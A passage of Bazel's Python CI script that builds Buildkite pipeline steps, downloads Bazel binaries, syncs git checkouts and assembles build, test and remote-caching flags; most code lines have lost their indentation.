return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazel_nojdk_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_nojdk_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazelci_agent(dest_dir, platform, version):
postfix = ""
if platform == "windows":
postfix = "x86_64-pc-windows-msvc.exe"
elif platform == "macos":
postfix = "x86_64-apple-darwin"
else:
postfix = "x86_64-unknown-linux-musl"
name = "bazelci-agent-{}-{}".format(version, postfix)
url = "https://github.com/bazelbuild/continuous-integration/releases/download/agent-{}/{}".format(version, name)
path = os.path.join(dest_dir, "bazelci-agent.exe" if platform == "windows" else "bazelci-agent")
execute_command(["curl", "-sSL", url, "-o", path])
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
return path
def get_mirror_path(git_repository, platform):
mirror_root = {
"macos": "/usr/local/var/bazelbuild/",
"windows": "c:\\buildkite\\bazelbuild\\",
}.get(platform, "/var/lib/bazelbuild/")
return mirror_root + re.sub(r"[^0-9A-Za-z]", "-", git_repository)
def clone_git_repository(git_repository, platform, git_commit=None):
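    """
    Clones the given repository into the downstream projects root (reusing a local mirror if one
    exists) and force-syncs the checkout and its submodules to the given commit or to origin/HEAD.
    """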
root = downstream_projects_root(platform)
project_name = re.search(r"/([^/]+)\.git$", git_repository).group(1)
clone_path = os.path.join(root, project_name)
print_collapsed_group(
"Fetching %s sources at %s" % (project_name, git_commit if git_commit else "HEAD")
)
mirror_path = get_mirror_path(git_repository, platform)
if not os.path.exists(clone_path):
if os.path.exists(mirror_path):
execute_command(
["git", "clone", "-v", "--reference", mirror_path, git_repository, clone_path]
)
else:
execute_command(["git", "clone", "-v", git_repository, clone_path])
os.chdir(clone_path)
execute_command(["git", "remote", "set-url", "origin", git_repository])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
execute_command(["git", "fetch", "origin"])
if git_commit:
# sync to a specific commit of this repository
execute_command(["git", "reset", git_commit, "--hard"])
else:
        # Sync to the latest commit of origin/HEAD. Unlike git pull, this also works after a force push.
remote_head = (
subprocess.check_output(["git", "symbolic-ref", "refs/remotes/origin/HEAD"])
.decode("utf-8")
.rstrip()
)
execute_command(["git", "reset", remote_head, "--hard"])
execute_command(["git", "submodule", "sync", "--recursive"])
execute_command(["git", "submodule", "update", "--init", "--recursive", "--force"])
execute_command(["git", "submodule", "foreach", "--recursive", "git reset --hard"])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
return clone_path
def execute_batch_commands(commands):
if not commands:
return
print_collapsed_group(":batch: Setup (Batch Commands)")
batch_commands = "&".join(commands)
return subprocess.run(batch_commands, shell=True, check=True, env=os.environ).returncode
def execute_shell_commands(commands):
if not commands:
return
print_collapsed_group(":bash: Setup (Shell Commands)")
shell_command = "\n".join(["set -e"] + commands)
execute_command([shell_command], shell=True)
def handle_bazel_failure(exception, action):
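    """During `bazelisk --migrate` runs a Bazel failure is expected and only logged; otherwise it aborts the build."""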
msg = "bazel {0} failed with exit code {1}".format(action, exception.returncode)
if use_bazelisk_migrate():
print_collapsed_group(msg)
else:
raise BuildkiteException(msg)
def execute_bazel_run(bazel_binary, platform, targets, incompatible_flags):
if not targets:
return
print_collapsed_group("Setup (Run Targets)")
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
incompatible_flags_to_use = (
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags
)
for target in targets:
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["run"]
+ common_build_flags(None, platform)
+ incompatible_flags_to_use
+ [target]
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "run")
def remote_caching_flags(platform):
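    """
    Returns the remote caching flags for this platform, including a "cache-silo-key" derived from
    the machine configuration so that incompatible machines do not share cache entries.
    """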
# Only enable caching for untrusted and testing builds.
if CLOUD_PROJECT not in ["bazel-untrusted"]:
return []
platform_cache_key = [BUILDKITE_ORG.encode("utf-8")]
    # Whenever the remote cache is known to have been poisoned, increase the number below.
platform_cache_key += ["cache-poisoning-20210811".encode("utf-8")]
if platform == "macos":
platform_cache_key += [
# macOS version:
subprocess.check_output(["/usr/bin/sw_vers", "-productVersion"]),
# Path to Xcode:
subprocess.check_output(["/usr/bin/xcode-select", "-p"]),
# Xcode version:
subprocess.check_output(["/usr/bin/xcodebuild", "-version"]),
]
# Use a local cache server for our macOS machines.
flags = ["--remote_cache=http://100.107.73.148"]
else:
platform_cache_key += [
# Platform name:
platform.encode("utf-8")
]
# Use RBE for caching builds running on GCE.
flags = [
"--google_default_credentials",
"--remote_cache=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/{}/instances/default_instance".format(CLOUD_PROJECT),
]
platform_cache_digest = hashlib.sha256()
for key in platform_cache_key:
eprint("Adding to platform cache key: {}".format(key))
platform_cache_digest.update(key)
platform_cache_digest.update(b":")
flags += [
"--remote_timeout=60",
"--remote_max_connections=200",
'--remote_default_platform_properties=properties:{name:"cache-silo-key" value:"%s"}'
% platform_cache_digest.hexdigest(),
]
return flags
def remote_enabled(flags):
# Detect if the project configuration enabled its own remote caching / execution.
remote_flags = ["--remote_executor", "--remote_cache", "--remote_http_cache"]
for flag in flags:
for remote_flag in remote_flags:
if flag.startswith(remote_flag):
return True
return False
def concurrent_jobs(platform):
return "75" if platform.startswith("rbe_") else str(multiprocessing.cpu_count())
def concurrent_test_jobs(platform):
if platform.startswith("rbe_"):
return "75"
elif platform == "windows":
return "8"
elif platform.startswith("macos") and THIS_IS_TESTING:
return "4"
elif platform.startswith("macos"):
return "8"
return "12"
def common_startup_flags(platform):
if platform == "windows":
if os.path.exists("D:/b"):
# This machine has a local SSD mounted as drive D.
return ["--output_user_root=D:/b"]
else:
# This machine uses its PD-SSD as the build directory.
return ["--output_user_root=C:/b"]
return []
def common_build_flags(bep_file, platform):
flags = [
"--show_progress_rate_limit=5",
"--curses=yes",
"--color=yes",
"--terminal_columns=143",
"--show_timestamps",
"--verbose_failures",
"--jobs=" + concurrent_jobs(platform),
"--announce_rc",
"--experimental_repository_cache_hardlinks",
# Some projects set --disk_cache in their project-specific bazelrc, which we never want on
# CI, so let's just disable it explicitly.
"--disk_cache=",
]
if platform == "windows":
pass
elif platform == "macos":
flags += [
"--sandbox_writable_path=/var/tmp/_bazel_buildkite/cache/repos/v1",
"--test_env=REPOSITORY_CACHE=/var/tmp/_bazel_buildkite/cache/repos/v1",
]
else:
flags += ["--sandbox_tmpfs_path=/tmp"]
if bep_file:
flags += [
"--experimental_build_event_json_file_path_conversion=false",
"--build_event_json_file=" + bep_file,
]
return flags
def rbe_flags(original_flags, accept_cached):
# Enable remote execution via RBE.
flags = [
"--remote_executor=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/bazel-untrusted/instances/default_instance",
"--remote_timeout=3600",
"--incompatible_strict_action_env",
"--google_default_credentials",
"--toolchain_resolution_debug",
]
# Enable BES / Build Results reporting.
flags += [
"--bes_backend=buildeventservice.googleapis.com",
"--bes_timeout=360s",
"--project_id=bazel-untrusted",
]
if not accept_cached:
flags += ["--noremote_accept_cached"]
# Adapted from https://github.com/bazelbuild/bazel-toolchains/blob/master/bazelrc/.bazelrc
flags += [
        # These should no longer need to be modified.
# All that is needed is updating the @bazel_toolchains repo pin
# in projects' WORKSPACE files.
#
# Toolchain related flags to append at the end of your .bazelrc file.
"--host_javabase=@buildkite_config//java:jdk",
"--javabase=@buildkite_config//java:jdk",
"--host_java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--crosstool_top=@buildkite_config//cc:toolchain",
"--action_env=BAZEL_DO_NOT_DETECT_CPP_TOOLCHAIN=1",
]
# Platform flags:
# The toolchain container used for execution is defined in the target indicated
# by "extra_execution_platforms", "host_platform" and "platforms".
# If you are using your own toolchain container, you need to create a platform
# target with "constraint_values" that allow for the toolchain specified with
# "extra_toolchains" to be selected (given constraints defined in
# "exec_compatible_with").
# More about platforms: https://docs.bazel.build/versions/master/platforms.html
# Don't add platform flags if they are specified already.
platform_flags = {
"--extra_toolchains": "@buildkite_config//config:cc-toolchain",
"--extra_execution_platforms": "@buildkite_config//config:platform",
"--host_platform": "@buildkite_config//config:platform",
"--platforms": "@buildkite_config//config:platform",
}
for platform_flag, value in list(platform_flags.items()):
found = False
for original_flag in original_flags:
if original_flag.startswith(platform_flag):
found = True
break
if not found:
flags += [platform_flag + "=" + value]
return flags
def compute_flags(
platform, flags, incompatible_flags, bep_file, bazel_binary, enable_remote_cache=False
):
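    """
    Aggregates the common build flags, RBE or remote caching flags, task-specific flags and
    incompatible flags, and expands the $HOME and $OUTPUT_BASE placeholders.
    """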
aggregated_flags = common_build_flags(bep_file, platform)
if not remote_enabled(flags):
if platform.startswith("rbe_"):
aggregated_flags += rbe_flags(flags, accept_cached=enable_remote_cache)
elif enable_remote_cache:
aggregated_flags += remote_caching_flags(platform)
aggregated_flags += flags
if incompatible_flags:
aggregated_flags += incompatible_flags
for i, flag in enumerate(aggregated_flags):
if "$HOME" in flag:
if platform == "windows":
if os.path.exists("D:/"):
home = "D:"
else:
home = "C:/b"
elif platform == "macos":
home = "/Users/buildkite"
else:
home = "/var/lib/buildkite-agent"
aggregated_flags[i] = flag.replace("$HOME", home)
if "$OUTPUT_BASE" in flag:
output_base = execute_command_and_get_output(
[bazel_binary] + common_startup_flags(platform) + ["info", "output_base"],
print_output=False,
).strip()
aggregated_flags[i] = flag.replace("$OUTPUT_BASE", output_base)
return aggregated_flags
def execute_bazel_clean(bazel_binary, platform):
print_expanded_group(":bazel: Clean")
try:
execute_command([bazel_binary] + common_startup_flags(platform) + ["clean", "--expunge"])
except subprocess.CalledProcessError as e:
raise BuildkiteException("bazel clean failed with exit code {}".format(e.returncode))
def kythe_startup_flags():
return [f"--bazelrc={KYTHE_DIR}/extractors.bazelrc"]
def kythe_build_flags():
return [
"--experimental_convenience_symlinks=normal",
f"--override_repository=kythe_release={KYTHE_DIR}",
]
def execute_bazel_build(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=True,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["build"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "build")
def execute_bazel_build_with_kythe(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=False,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ kythe_startup_flags()
+ ["build"]
+ kythe_build_flags()
+ aggregated_flags
+ ["--"]
+ targets
)
def calculate_targets(task_config, platform, bazel_binary, build_only, test_only):
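    """
    Returns the (build, test, index) targets for this task, expanding "index_targets_query" via
    `bazel query` and reducing the test targets to the current shard if sharding is enabled.
    """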
build_targets = [] if test_only else task_config.get("build_targets", [])
test_targets = [] if build_only else task_config.get("test_targets", [])
index_targets = [] if (build_only or test_only) else task_config.get("index_targets", [])
index_targets_query = (
None if (build_only or test_only) else task_config.get("index_targets_query", None)
)
if index_targets_query:
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "query", index_targets_query],
print_output=False,
)
index_targets += output.strip().split("\n")
# Remove the "--" argument splitter from the list that some configs explicitly
# include. We'll add it back again later where needed.
build_targets = [x.strip() for x in build_targets if x.strip() != "--"]
test_targets = [x.strip() for x in test_targets if x.strip() != "--"]
index_targets = [x.strip() for x in index_targets if x.strip() != "--"]
shard_id = int(os.getenv("BUILDKITE_PARALLEL_JOB", "-1"))
shard_count = int(os.getenv("BUILDKITE_PARALLEL_JOB_COUNT", "-1"))
if shard_id > -1 and shard_count > -1:
print_collapsed_group(
":female-detective: Calculating targets for shard {}/{}".format(
shard_id + 1, shard_count
)
)
expanded_test_targets = expand_test_target_patterns(bazel_binary, platform, test_targets)
test_targets = get_targets_for_shard(expanded_test_targets, shard_id, shard_count)
return build_targets, test_targets, index_targets
def expand_test_target_patterns(bazel_binary, platform, test_targets):
included_targets, excluded_targets = partition_targets(test_targets)
excluded_string = (
" except tests(set({}))".format(" ".join("'{}'".format(t) for t in excluded_targets))
if excluded_targets
else ""
)
exclude_manual = ' except tests(attr("tags", "manual", set({})))'.format(
" ".join("'{}'".format(t) for t in included_targets)
)
eprint("Resolving test targets via bazel query")
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ [
"--nomaster_bazelrc",
"--bazelrc=/dev/null",
"query",
"tests(set({})){}{}".format(
" ".join("'{}'".format(t) for t in included_targets),
excluded_string,
exclude_manual,
),
],
print_output=False,
).strip()
return output.split("\n") if output else []
def partition_targets(targets):
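    """Splits targets into included and excluded targets (those prefixed with "-", returned without the prefix)."""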
included_targets, excluded_targets = [], []
for target in targets:
if target.startswith("-"):
excluded_targets.append(target[1:])
else:
included_targets.append(target)
return included_targets, excluded_targets
def get_targets_for_shard(test_targets, shard_id, shard_count):
# TODO(fweikert): implement a more sophisticated algorithm
return sorted(test_targets)[shard_id::shard_count]
def execute_bazel_test(
bazel_version,
bazel_binary,
platform,
flags,
targets,
bep_file,
monitor_flaky_tests,
incompatible_flags,
):
aggregated_flags = [
"--flaky_test_attempts=3",
"--build_tests_only",
"--local_test_jobs=" + concurrent_test_jobs(platform),
]
# Don't enable remote caching if the user enabled remote execution / caching themselves
# or flaky test monitoring is enabled, as remote caching makes tests look less flaky than
# they are.
print_collapsed_group(":bazel: Computing flags for test step")
aggregated_flags += compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=not monitor_flaky_tests,
)
print_expanded_group(":bazel: Test ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["test"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "test")
def upload_test_logs_from_bep(bep_file, tmpdir, binary_platform, monitor_flaky_tests):
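    """
    Invokes the bazelci-agent tool to upload test logs referenced in the given BEP file to
    Buildkite. The caller runs this in a background thread so that logs can be uploaded while
    the tests are still in progress.
    """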
bazelci_agent_binary = download_bazelci_agent(tmpdir, binary_platform, "0.1.3")
execute_command(
[bazelci_agent_binary, "artifact", "upload", "--delay=5", "--mode=buildkite", "--build_event_json_file={}".format(bep_file)]
+ (["--monitor_flaky_tests"] if monitor_flaky_tests else [])
)
def upload_json_profile(json_profile_path, tmpdir):
if not os.path.exists(json_profile_path):
return
print_collapsed_group(":gcloud: Uploading JSON Profile")
execute_command(["buildkite-agent", "artifact", "upload", json_profile_path], cwd=tmpdir)
def upload_corrupted_outputs(capture_corrupted_outputs_dir, tmpdir):
if not os.path.exists(capture_corrupted_outputs_dir):
return
print_collapsed_group(":gcloud: Uploading corrupted outputs")
execute_command(
["buildkite-agent", "artifact", "upload", "{}/**/*".format(capture_corrupted_outputs_dir)],
cwd=tmpdir,
)
def execute_command_and_get_output(args, shell=False, fail_if_nonzero=True, print_output=True):
eprint(" ".join(args))
process = subprocess.run(
args,
shell=shell,
check=fail_if_nonzero,
env=os.environ,
stdout=subprocess.PIPE,
errors="replace",
universal_newlines=True,
)
if print_output:
eprint(process.stdout)
return process.stdout
def execute_command(args, shell=False, fail_if_nonzero=True, cwd=None, print_output=True):
if print_output:
eprint(" ".join(args))
return subprocess.run(
args, shell=shell, check=fail_if_nonzero, env=os.environ, cwd=cwd
).returncode
def execute_command_background(args):
eprint(" ".join(args))
return subprocess.Popen(args, env=os.environ)
def terminate_background_process(process):
if process:
process.terminate()
try:
process.wait(timeout=10)
except subprocess.TimeoutExpired:
process.kill()
def create_step(label, commands, platform, shards=1, soft_fail=None):
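    """
    Creates a Buildkite step for the given platform (a Docker step for platforms that define a
    "docker-image", a queue-based step otherwise) with optional sharding, an 8 hour timeout and
    automatic retries for lost or killed agents.
    """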
if "docker-image" in PLATFORMS[platform]:
step = create_docker_step(
label, image=PLATFORMS[platform]["docker-image"], commands=commands
)
else:
step = {
"label": label,
"command": commands,
"agents": {"queue": PLATFORMS[platform]["queue"]},
}
if shards > 1:
step["label"] += " (shard %n)"
step["parallelism"] = shards
if soft_fail is not None:
step["soft_fail"] = soft_fail
# Enforce a global 8 hour job timeout.
step["timeout_in_minutes"] = 8 * 60
# Automatically retry when an agent got lost (usually due to an infra flake).
step["retry"] = {
"automatic": [
{"exit_status": -1, "limit": 3}, # Buildkite internal "agent lost" exit code
{"exit_status": 137, "limit": 3}, # SIGKILL
{"exit_status": 143, "limit": 3}, # SIGTERM
]
}
return step
def create_docker_step(label, image, commands=None, additional_env_vars=None):
env = ["ANDROID_HOME", "ANDROID_NDK_HOME", "BUILDKITE_ARTIFACT_UPLOAD_DESTINATION"]
if additional_env_vars:
env += ["{}={}".format(k, v) for k, v in additional_env_vars.items()]
step = {
"label": label,
"command": commands,
"agents": {"queue": "default"},
"plugins": {
"docker#v3.8.0": {
"always-pull": True,
"environment": env,
"image": image,
"network": "host",
"privileged": True,
"propagate-environment": True,
"propagate-uid-gid": True,
"volumes": [
"/etc/group:/etc/group:ro",
"/etc/passwd:/etc/passwd:ro",
"/etc/shadow:/etc/shadow:ro",
"/opt/android-ndk-r15c:/opt/android-ndk-r15c:ro",
"/opt/android-sdk-linux:/opt/android-sdk-linux:ro",
"/var/lib/buildkite-agent:/var/lib/buildkite-agent",
"/var/lib/gitmirrors:/var/lib/gitmirrors:ro",
"/var/run/docker.sock:/var/run/docker.sock",
],
}
},
}
if not step["command"]:
del step["command"]
return step
def print_project_pipeline(
configs,
project_name,
http_config,
file_config,
git_repository,
monitor_flaky_tests,
use_but,
incompatible_flags,
notify,
):
task_configs = configs.get("tasks", None)
if not task_configs:
raise BuildkiteException("{0} pipeline configuration is empty.".format(project_name))
pipeline_steps = []
# If the repository is hosted on Git-on-borg, we show the link to the commit Gerrit review
buildkite_repo = os.getenv("BUILDKITE_REPO")
if is_git_on_borg_repo(buildkite_repo):
show_gerrit_review_link(buildkite_repo, pipeline_steps)
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
# In Bazel Downstream Project pipelines, git_repository and project_name must be specified.
is_downstream_project = (use_but or incompatible_flags) and git_repository and project_name
buildifier_config = configs.get("buildifier")
# Skip Buildifier when we test downstream projects.
if buildifier_config and not is_downstream_project:
buildifier_env_vars = {}
if isinstance(buildifier_config, str):
# Simple format:
# ---
# buildifier: latest
buildifier_env_vars["BUILDIFIER_VERSION"] = buildifier_config
else:
# Advanced format:
# ---
# buildifier:
# version: latest
# warnings: all
if "version" in buildifier_config:
buildifier_env_vars["BUILDIFIER_VERSION"] = buildifier_config["version"]
if "warnings" in buildifier_config:
buildifier_env_vars["BUILDIFIER_WARNINGS"] = buildifier_config["warnings"]
if not buildifier_env_vars:
raise BuildkiteException(
'Invalid buildifier configuration entry "{}"'.format(buildifier_config)
)
pipeline_steps.append(
create_docker_step(
BUILDIFIER_STEP_NAME,
image=BUILDIFIER_DOCKER_IMAGE,
additional_env_vars=buildifier_env_vars,
)
)
# In Bazel Downstream Project pipelines, we should test the project at the last green commit.
git_commit = None
if is_downstream_project:
last_green_commit_url = bazelci_last_green_commit_url(
git_repository, DOWNSTREAM_PROJECTS[project_name]["pipeline_slug"]
)
git_commit = get_last_green_commit(last_green_commit_url)
config_hashes = set()
skipped_due_to_bazel_version = []
for task, task_config in task_configs.items():
platform = get_platform_for_task(task, task_config)
task_name = task_config.get("name")
soft_fail = task_config.get("soft_fail")
# We override the Bazel version in downstream pipelines. This means that two tasks that
# only differ in the value of their explicit "bazel" field will be identical in the
# downstream pipeline, thus leading to duplicate work.
# Consequently, we filter those duplicate tasks here.
if is_downstream_project:
# Skip tasks that require a specific Bazel version
bazel = task_config.get("bazel")
if bazel and bazel != "latest":
skipped_due_to_bazel_version.append(
"{}: '{}'".format(
create_label(platform, project_name, task_name=task_name), bazel
)
)
continue
h = hash_task_config(task, task_config)
if h in config_hashes:
continue
config_hashes.add(h)
shards = task_config.get("shards", "1")
try:
shards = int(shards)
except ValueError:
raise BuildkiteException("Task {} has invalid shard value '{}'".format(task, shards))
step = runner_step(
platform=platform,
task=task,
task_name=task_name,
project_name=project_name,
http_config=http_config,
file_config=file_config,
git_repository=git_repository,
git_commit=git_commit,
monitor_flaky_tests=monitor_flaky_tests,
use_but=use_but,
incompatible_flags=incompatible_flags,
shards=shards,
soft_fail=soft_fail,
)
pipeline_steps.append(step)
if skipped_due_to_bazel_version:
lines = ["\n- {}".format(s) for s in skipped_due_to_bazel_version]
commands = [
"buildkite-agent annotate --style=info '{}' --append --context 'ctx-skipped_due_to_bazel_version'".format(
"".join(lines)
),
"buildkite-agent meta-data set 'has-skipped-steps' 'true'",
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks due to different Bazel versions",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
all_downstream_pipeline_slugs = []
for _, config in DOWNSTREAM_PROJECTS.items():
all_downstream_pipeline_slugs.append(config["pipeline_slug"])
    # We update the last green commit only if all of the following hold:
    # 1. This job runs on the master, stable or main branch (it could be a custom build launched manually).
    # 2. We intend to run the same job downstream with Bazel@HEAD (e.g. google-bazel-presubmit).
    # 3. This job is not:
    #    - a GitHub pull request
    #    - using a custom-built Bazel binary (in the Bazel Downstream Projects pipeline)
    #    - testing incompatible flags
    #    - running `bazelisk --migrate` in a non-downstream pipeline
if (
current_branch_is_main_branch()
and pipeline_slug in all_downstream_pipeline_slugs
and not (is_pull_request() or use_but or incompatible_flags or use_bazelisk_migrate())
):
# We need to call "Try Update Last Green Commit" even if there are failures,
# since we don't want a failing Buildifier step to block the update of
# the last green commit for this project.
# try_update_last_green_commit() ensures that we don't update the commit
# if any build or test steps fail.
pipeline_steps.append({"wait": None, "continue_on_failure": True})
pipeline_steps.append(
create_step(
label="Try Update Last Green Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_commit",
],
platform=DEFAULT_PLATFORM,
)
)
if "validate_config" in configs:
pipeline_steps += create_config_validation_steps()
if use_bazelisk_migrate() and not is_downstream_project:
# Print results of bazelisk --migrate in project pipelines that explicitly set
# the USE_BAZELISK_MIGRATE env var, but that are not being run as part of a
# downstream pipeline.
number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_steps += get_steps_for_aggregating_migration_results(number, notify)
print_pipeline_steps(pipeline_steps, handle_emergencies=not is_downstream_project)
def show_gerrit_review_link(git_repository, pipeline_steps):
    match = re.search(r"https://(.+?)\.googlesource", git_repository)
    if not match:
        raise BuildkiteException("Couldn't get host name from %s" % git_repository)
    host = match.group(1)
text = "The transformed code used in this pipeline can be found under https://{}-review.googlesource.com/q/{}".format(
host, os.getenv("BUILDKITE_COMMIT")
)
commands = ["buildkite-agent annotate --style=info '{}'".format(text)]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about Gerrit Review Link",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def is_git_on_borg_repo(git_repository):
return git_repository and "googlesource.com" in git_repository
def hash_task_config(task_name, task_config):
# Two task configs c1 and c2 have the same hash iff they lead to two functionally identical jobs
# in the downstream pipeline. This function discards the "bazel" field (since it's being
# overridden) and the "name" field (since it has no effect on the actual work).
# Moreover, it adds an explicit "platform" field if that's missing.
cpy = task_config.copy()
cpy.pop("bazel", None)
cpy.pop("name", None)
if "platform" not in cpy:
cpy["platform"] = task_name
m = hashlib.md5()
for key in sorted(cpy):
value = "%s:%s;" % (key, cpy[key])
m.update(value.encode("utf-8"))
return m.digest()
def get_platform_for_task(task, task_config):
# Most pipeline configurations have exactly one task per platform, which makes it
# convenient to use the platform name as task ID. Consequently, we use the
# task ID as platform if there is no explicit "platform" field.
return task_config.get("platform", task)
def create_config_validation_steps():
output = execute_command_and_get_output(
["git", "diff-tree", "--no-commit-id", "--name-only", "-r", os.getenv("BUILDKITE_COMMIT")]
)
config_files = [
path
for path in output.split("\n")
if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
]
return [
create_step(
label=":cop: Validate {}".format(f),
commands=[
fetch_bazelcipy_command(),
"{} bazelci.py project_pipeline --file_config={}".format(
PLATFORMS[DEFAULT_PLATFORM]["python"], f
),
],
platform=DEFAULT_PLATFORM,
)
for f in config_files
]
def print_pipeline_steps(pipeline_steps, handle_emergencies=True):
if handle_emergencies:
emergency_step = create_emergency_announcement_step_if_necessary()
if emergency_step:
pipeline_steps.insert(0, emergency_step)
print(yaml.dump({"steps": pipeline_steps}))
def create_emergency_announcement_step_if_necessary():
style = "error"
message, issue_url, last_good_bazel = None, None, None
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
message = emergency_settings.get("message")
issue_url = emergency_settings.get("issue_url")
last_good_bazel = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError as ex:
message = str(ex)
style = "warning"
if not any([message, issue_url, last_good_bazel]):
return
text = '<span class="h1">:rotating_light: Emergency :rotating_light:</span>\n'
if message:
text += "- {}\n".format(message)
if issue_url:
text += '- Please check this <a href="{}">issue</a> for more details.\n'.format(issue_url)
if last_good_bazel:
text += (
"- Default Bazel version is *{}*, "
"unless the pipeline configuration specifies an explicit version."
).format(last_good_bazel)
return create_step(
label=":rotating_light: Emergency :rotating_light:",
commands=[
'buildkite-agent annotate --append --style={} --context "omg" "{}"'.format(style, text)
],
platform=DEFAULT_PLATFORM,
)
def runner_step(
platform,
task,
task_name=None,
project_name=None,
http_config=None,
file_config=None,
git_repository=None,
git_commit=None,
monitor_flaky_tests=False,
use_but=False,
incompatible_flags=None,
shards=1,
soft_fail=None,
):
command = PLATFORMS[platform]["python"] + " bazelci.py runner --task=" + task
if http_config:
command += " --http_config=" + http_config
if file_config:
command += " --file_config=" + file_config
if git_repository:
command += " --git_repository=" + git_repository
if git_commit:
command += " --git_commit=" + git_commit
if monitor_flaky_tests:
command += " --monitor_flaky_tests"
if use_but:
command += " --use_but"
for flag in incompatible_flags or []:
command += " --incompatible_flag=" + flag
label = create_label(platform, project_name, task_name=task_name)
return create_step(
label=label,
commands=[fetch_bazelcipy_command(), command],
platform=platform,
shards=shards,
soft_fail=soft_fail,
)
def fetch_bazelcipy_command():
return "curl -sS {0} -o bazelci.py".format(SCRIPT_URL)
def fetch_incompatible_flag_verbose_failures_command():
return "curl -sS {0} -o incompatible_flag_verbose_failures.py".format(
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL
)
def fetch_aggregate_incompatible_flags_test_result_command():
return "curl -sS {0} -o aggregate_incompatible_flags_test_result.py".format(
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL
)
def upload_project_pipeline_step(
project_name, git_repository, http_config, file_config, incompatible_flags
):
pipeline_command = (
'{0} bazelci.py project_pipeline --project_name="{1}" ' + "--git_repository={2}"
).format(PLATFORMS[DEFAULT_PLATFORM]["python"], project_name, git_repository)
if incompatible_flags is None:
pipeline_command += " --use_but"
else:
for flag in incompatible_flags:
pipeline_command += " --incompatible_flag=" + flag
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " | buildkite-agent pipeline upload"
return create_step(
label="Setup {0}".format(project_name),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=DEFAULT_PLATFORM,
)
def create_label(platform, project_name, build_only=False, test_only=False, task_name=None):
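    """Builds a human-readable step label such as "Build <project> (<task> on <platform>)"."""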
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
platform_display_name = PLATFORMS[platform]["emoji-name"]
if build_only:
label = "Build "
elif test_only:
label = "Test "
else:
label = ""
platform_label = (
"{0} on {1}".format(task_name, platform_display_name)
if task_name
else platform_display_name
)
if project_name:
label += "{0} ({1})".format(project_name, platform_label)
else:
label += platform_label
return label
def bazel_build_step(
task,
platform,
project_name,
http_config=None,
file_config=None,
build_only=False,
test_only=False,
):
pipeline_command = PLATFORMS[platform]["python"] + " bazelci.py runner"
if build_only:
pipeline_command += " --build_only --save_but"
if test_only:
pipeline_command += " --test_only"
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " --task=" + task
return create_step(
label=create_label(platform, project_name, build_only, test_only),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=platform,
)
